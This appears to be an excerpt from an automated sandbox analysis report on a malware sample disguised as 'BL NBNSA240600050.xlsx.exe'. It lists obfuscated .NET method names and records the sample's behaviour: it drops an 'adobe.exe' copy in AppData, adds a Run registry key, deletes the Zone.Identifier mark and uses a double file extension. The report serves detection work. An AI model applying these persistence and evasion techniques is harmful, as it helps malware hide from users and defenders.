Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, BuJPS6ziS0E9VACSpR.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OYR9ofikev', 'AKV966I6W9', 'Mip9cFbVwd', 'a5k9qxXGCF', 'mtQ9j1Lg2M', 'bJq99nCYq0', 'Uxx9PawGZm'
Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, hV0xmh8WF4CoK4wYf1.cs	High entropy of concatenated method names: 'ooZjSmj3CC', 'PENj2sMJIO', 'O9PjJD64T8', 'vvMj0UnCce', 'GFejAI04Aj', 'xsPjhADeMg', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, exKe8cY6Q80R2829i4.cs	High entropy of concatenated method names: 'omJwaXARGE', 'HB4wpghKiF', 'Yb9w5qgRjU', 'pKB5LubxAe', 'NxA5znS8eW', 'GO6wD2BE1C', 'BCswFW3wwd', 'w99wRNOVKt', 'KJywnrsEGC', 'ItlwHacYBq'
Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, QFHZ6TWxna4KHlLMko.cs	High entropy of concatenated method names: 'yfOpivqATc', 'U6VpyWlRB9', 'Tu2pkAoPR6', 'eTBpWKW64A', 'nbKp6us8L9', 'tUhpcTxyND', 'RvApqbIXpE', 'R99pjDvtnQ', 'MgYp93XvqQ', 'k2tpPBJTSI'
Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, Dbt0LtLFHvJihXRuJn.cs	High entropy of concatenated method names: 'Utn9FkePGm', 'keT9nAPtcG', 'HWX9HNVe7L', 'eeB9axFymD', 'OcS9CtABT2', 'CDf9GgFJyK', 'UVb95ycouG', 'nmPjXLZdZe', 'TPAjxNWo8g', 'ywaj8pPw3s'
Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, mHtIwRS5kqd3vV1Tcw.cs	High entropy of concatenated method names: 'Mh45eV17KM', 'md95Cr7o7i', 'HaE5GiRnQ7', 'Fwk5wfuSAZ', 'sH35VqcP2d', 'B7sGI3ttTw', 'lemGlnq3mx', 'jbsGXlcKLY', 'Vg2GxLhCSG', 'dr5G8pM6jc'
Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, mdGCiWky1rqgK3BVbJ.cs	High entropy of concatenated method names: 'H3tCAfBTmc', 'uhnCZdv3fg', 'zcxCKkNfgX', 'UiyCtFE85T', 'p6tCIeyH4B', 'kdOCl3Q6iJ', 'RaFCXETpWL', 'bOICxxlyXv', 'mnSC835g4L', 'cocCLpEDu3'
Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, Gqq4I67n35f0dnsQXh.cs	High entropy of concatenated method names: 'V0FGm6mDab', 'UMbGUv2cbf', 'AKupJq9h1Z', 'c1dp0tNtto', 'REgphY3r7O', 'r5pp3LVND5', 'e1xpYbhRJl', 'dn4p4dF4ud', 'j6PpTIVxtk', 'NUQpg1vwk6'
Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, WU9xXZHUFOv3sToHX0.cs	High entropy of concatenated method names: 'v61FwdGCiW', 'C1rFVqgK3B', 'MxnFEa4KHl', 'YMkF1oSqq4', 'csQF6Xh1Ht', 'UwRFc5kqd3', 'PlrKgILw8TFs35U6PA', 'uSEOmf83sduV8cyuE0', 'KPBFFsRjDD', 'h08FnHXOf3'
Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, PobRQUp3r4CRDKbIFP.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'g15R8hafGU', 'V71RLkBYKC', 'hwQRz8sMqw', 'EQqnDNrDm6', 'yccnFNUB2a', 'LMRnRZU24G', 'AjPnn9DHFg', 'bbJsGRwCsYBiAigJ6wF'
Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, MP38G7Vnbsb34JkM2R.cs	High entropy of concatenated method names: 'I4KneHuVre', 'Y6wnaP8fUI', 'eV5nCN0EuU', 'Fivnp7Tnyc', 'S4MnGZ7yjy', 'Nkln5ToQg0', 'aMgnwYRR07', 'YRWnV75sNT', 'TnNnQyQBR0', 'xEInEWsZuh'
Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, vSUPRMtMllWME9qh6T.cs	High entropy of concatenated method names: 'gNJqEpJX8o', 'mpaq1CYbXK', 'ToString', 'hErqahHGTv', 'cngqChBcnk', 'xoZqpH4dHf', 'qWCqGKhOdX', 'cK3q5xnrVB', 'UUaqwrEDRs', 'NoXqVRsAnX'
Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, oIIKDgxaJ1h8GFY2EE.cs	High entropy of concatenated method names: 'uEKjaIa7AF', 'BPGjCb3TE8', 'QMxjpdwY3q', 'gdPjGwlJup', 'hiVj57MQa7', 'gMwjw3Ah25', 'werjV7nGnH', 'LvsjQ9DMV0', 'uF2jE07Zk4', 'boaj1HIpxQ'
Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, qofamIT3b6JCk8JnFG.cs	High entropy of concatenated method names: 'EcCwsDob9s', 'TBtwuySddH', 'fKbwr8cnoJ', 'FHbwiryclp', 'lhFwmIYt9c', 'bydwyt6OSO', 'e2GwU6U7fS', 'FEbwkLPQBY', 'Rn4wWwlgQW', 'w5Ww7XQPm8'
Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, eniAxGROmKWOgQBO1N.cs	High entropy of concatenated method names: 'jd8rpPsqq', 'pVPiGW7i7', 'CkWy6eDaI', 'AgEUIqQoh', 'v9wWQIv40', 'PPQ7rrrpa', 'esSg86Z6s2bPhmGyTV', 'k53DyDYxrOVSIayRaO', 'DlUDrwQxlJsbDQDbpF', 'MHEj7Ycwe'
Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, VlkgChFntyasldR9WSg.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ghXPAORNQf', 'E4YPZjCFZv', 'gYdPKmaobP', 'Cr1PtfVXVt', 'G09PI2dZI7', 'cHiPlCmYrm', 'jnQPXHNf6Y'
Source: 0.2.BL NBNSA240600050.xlsx.exe.8110000.9.raw.unpack, lNjw1JhxSV5n0cCMNW.cs	High entropy of concatenated method names: 'Kb0HWSL22O', 'RgtTUJcyZL', 'jHu2HrxObq', 'UAF22bihQq', 'Hla2xZGvyo', 'XAB2tPq0q8', 'aeMUEk3AsB3Pt', 'xw8jvYcwb', 'eSADOWkF2', 'hfhQtMtDc'
Source: 0.2.BL NBNSA240600050.xlsx.exe.8110000.9.raw.unpack, NkEtj4xdihRGcDPjVY.cs	High entropy of concatenated method names: 'HVYMFtP2f', 'CuEekxjKf', 'WGqJ3oTFt', 'GCn1bRmSG', 'Kbtl1TeP0', 'Fy7hiDf8S', 'e5JqCGSck', 'C2SLkryPZ', 'ksT8NQvKO', 'zvqT1Z212'

Persistence and Installation Behavior

Drops executable to a common third party application directory

Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe

File written: C:\Users\user\AppData\Roaming\Adobe\adobe.exe

Jump to behavior

Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe

File created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe

Jump to dropped file

Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run adobe			Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run adobe			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe

File opened: C:\Users\user\AppData\Roaming\adobe\adobe.exe:Zone.Identifier read attributes | delete

Jump to behavior

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: xlsx.exe

Static PE information: BL NBNSA240600050.xlsx.exe

Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior

Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
